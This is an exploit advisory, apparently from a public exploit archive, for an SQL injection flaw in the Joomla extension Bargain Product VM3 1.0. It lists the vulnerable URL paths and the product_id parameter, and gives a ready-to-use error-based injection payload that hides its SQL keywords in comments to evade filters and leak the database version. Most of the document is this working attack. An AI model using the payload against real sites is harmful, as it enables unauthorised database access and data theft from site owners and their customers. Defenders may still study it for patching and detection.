28 lines
No EOL
979 B
Text
28 lines
No EOL
979 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 25.08.2017
|
|
# Vendor Homepage: https://www.weborange.eu/
|
|
# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
|
|
# Demo: http://www.weborange.eu/demo/index.php/bargain-product
|
|
# Version: 1.0
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
|
|
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
|
|
#
|
|
# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
|
|
#
|
|
# Etc..
|
|
# # # # # |